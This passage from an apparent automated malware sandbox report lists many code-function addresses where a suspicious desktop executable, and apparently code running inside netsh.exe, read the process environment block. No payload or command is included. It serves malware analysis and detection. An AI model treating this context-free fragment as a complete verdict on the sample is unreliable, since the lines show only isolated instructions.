          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0106A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01014D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01012581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEAD30 mov eax, dword ptr fs:[00000030h]2_2_00FEAD30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8CD6 mov eax, dword ptr fs:[00000030h]2_2_010B8CD6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A14FB mov eax, dword ptr fs:[00000030h]2_2_010A14FB
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h]2_2_01066CF0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]2_2_010B070D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B070D mov eax, dword ptr fs:[00000030h]2_2_010B070D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]2_2_0101A70E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h]2_2_0101A70E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100F716 mov eax, dword ptr fs:[00000030h]2_2_0100F716
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]2_2_0107FF10
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h]2_2_0107FF10
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF76E2 mov eax, dword ptr fs:[00000030h]2_2_00FF76E2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101E730 mov eax, dword ptr fs:[00000030h]2_2_0101E730
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8F6A mov eax, dword ptr fs:[00000030h]2_2_010B8F6A
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF766D mov eax, dword ptr fs:[00000030h]2_2_00FF766D
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01067794 mov eax, dword ptr fs:[00000030h]2_2_01067794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h]2_2_00FF7E41
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEE620 mov eax, dword ptr fs:[00000030h]2_2_00FEE620
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010237F5 mov eax, dword ptr fs:[00000030h]2_2_010237F5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h]2_2_00FEC600
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01018E00 mov eax, dword ptr fs:[00000030h]2_2_01018E00
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A1608 mov eax, dword ptr fs:[00000030h]2_2_010A1608
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]2_2_0101A61C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h]2_2_0101A61C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FE3F mov eax, dword ptr fs:[00000030h]2_2_0109FE3F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]2_2_010AAE44
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h]2_2_010AAE44
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF8794 mov eax, dword ptr fs:[00000030h]2_2_00FF8794
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h]2_2_0100AE73
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0107FE87 mov eax, dword ptr fs:[00000030h]2_2_0107FE87
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFFF60 mov eax, dword ptr fs:[00000030h]2_2_00FFFF60
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010646A7 mov eax, dword ptr fs:[00000030h]2_2_010646A7
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h]2_2_010B0EA5
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFEF40 mov eax, dword ptr fs:[00000030h]2_2_00FFEF40
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01028EC7 mov eax, dword ptr fs:[00000030h]2_2_01028EC7
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0109FEC0 mov eax, dword ptr fs:[00000030h]2_2_0109FEC0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010136CC mov eax, dword ptr fs:[00000030h]2_2_010136CC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]2_2_00FE4F2E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h]2_2_00FE4F2E
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B8ED6 mov eax, dword ptr fs:[00000030h]2_2_010B8ED6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010116E0 mov ecx, dword ptr fs:[00000030h]2_2_010116E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388138A mov eax, dword ptr fs:[00000030h]12_2_0388138A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]12_2_037F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h]12_2_037F3B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387D380 mov ecx, dword ptr fs:[00000030h]12_2_0387D380
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB60 mov ecx, dword ptr fs:[00000030h]12_2_037CDB60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF358 mov eax, dword ptr fs:[00000030h]12_2_037CF358
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03895BA5 mov eax, dword ptr fs:[00000030h]12_2_03895BA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CDB40 mov eax, dword ptr fs:[00000030h]12_2_037CDB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]12_2_038453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038453CA mov eax, dword ptr fs:[00000030h]12_2_038453CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388131B mov eax, dword ptr fs:[00000030h]12_2_0388131B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EDBE9 mov eax, dword ptr fs:[00000030h]12_2_037EDBE9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h]12_2_037F03E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898B58 mov eax, dword ptr fs:[00000030h]12_2_03898B58
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h]12_2_037F4BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2397 mov eax, dword ptr fs:[00000030h]12_2_037F2397
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FB390 mov eax, dword ptr fs:[00000030h]12_2_037FB390
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]12_2_037D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h]12_2_037D1B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h]12_2_037C9240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E3A1C mov eax, dword ptr fs:[00000030h]12_2_037E3A1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]12_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h]12_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov ecx, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h]12_2_037C5210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D8A0A mov eax, dword ptr fs:[00000030h]12_2_037D8A0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2AE4 mov eax, dword ptr fs:[00000030h]12_2_037F2AE4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]12_2_0388AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h]12_2_0388AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]12_2_03804A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h]12_2_03804A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2ACB mov eax, dword ptr fs:[00000030h]12_2_037F2ACB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]12_2_037DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h]12_2_037DAAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FFAB0 mov eax, dword ptr fs:[00000030h]12_2_037FFAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03854257 mov eax, dword ptr fs:[00000030h]12_2_03854257
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h]12_2_037C52A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388EA55 mov eax, dword ptr fs:[00000030h]12_2_0388EA55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]12_2_0387B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0387B260 mov eax, dword ptr fs:[00000030h]12_2_0387B260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]12_2_037FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FD294 mov eax, dword ptr fs:[00000030h]12_2_037FD294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03898A62 mov eax, dword ptr fs:[00000030h]12_2_03898A62
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0380927A mov eax, dword ptr fs:[00000030h]12_2_0380927A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]12_2_037CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB171 mov eax, dword ptr fs:[00000030h]12_2_037CB171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CC962 mov eax, dword ptr fs:[00000030h]12_2_037CC962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038469A6 mov eax, dword ptr fs:[00000030h]12_2_038469A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]12_2_037EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EB944 mov eax, dword ptr fs:[00000030h]12_2_037EB944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038451BE mov eax, dword ptr fs:[00000030h]12_2_038451BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]12_2_037F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F513A mov eax, dword ptr fs:[00000030h]12_2_037F513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov eax, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E4120 mov ecx, dword ptr fs:[00000030h]12_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038541E8 mov eax, dword ptr fs:[00000030h]12_2_038541E8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C9100 mov eax, dword ptr fs:[00000030h]12_2_037C9100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CB1E1 mov eax, dword ptr fs:[00000030h]12_2_037CB1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]12_2_037F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F61A0 mov eax, dword ptr fs:[00000030h]12_2_037F61A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2990 mov eax, dword ptr fs:[00000030h]12_2_037F2990
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA185 mov eax, dword ptr fs:[00000030h]12_2_037FA185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037EC182 mov eax, dword ptr fs:[00000030h]12_2_037EC182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]12_2_03843884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03843884 mov eax, dword ptr fs:[00000030h]12_2_03843884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]12_2_037E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E0050 mov eax, dword ptr fs:[00000030h]12_2_037E0050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038090AF mov eax, dword ptr fs:[00000030h]12_2_038090AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F002D mov eax, dword ptr fs:[00000030h]12_2_037F002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov ecx, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0385B8D0 mov eax, dword ptr fs:[00000030h]12_2_0385B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB02A mov eax, dword ptr fs:[00000030h]12_2_037DB02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C58EC mov eax, dword ptr fs:[00000030h]12_2_037C58EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03847016 mov eax, dword ptr fs:[00000030h]12_2_03847016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]12_2_03894015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03894015 mov eax, dword ptr fs:[00000030h]12_2_03894015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov ecx, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FF0BF mov eax, dword ptr fs:[00000030h]12_2_037FF0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A0 mov eax, dword ptr fs:[00000030h]12_2_037F20A0
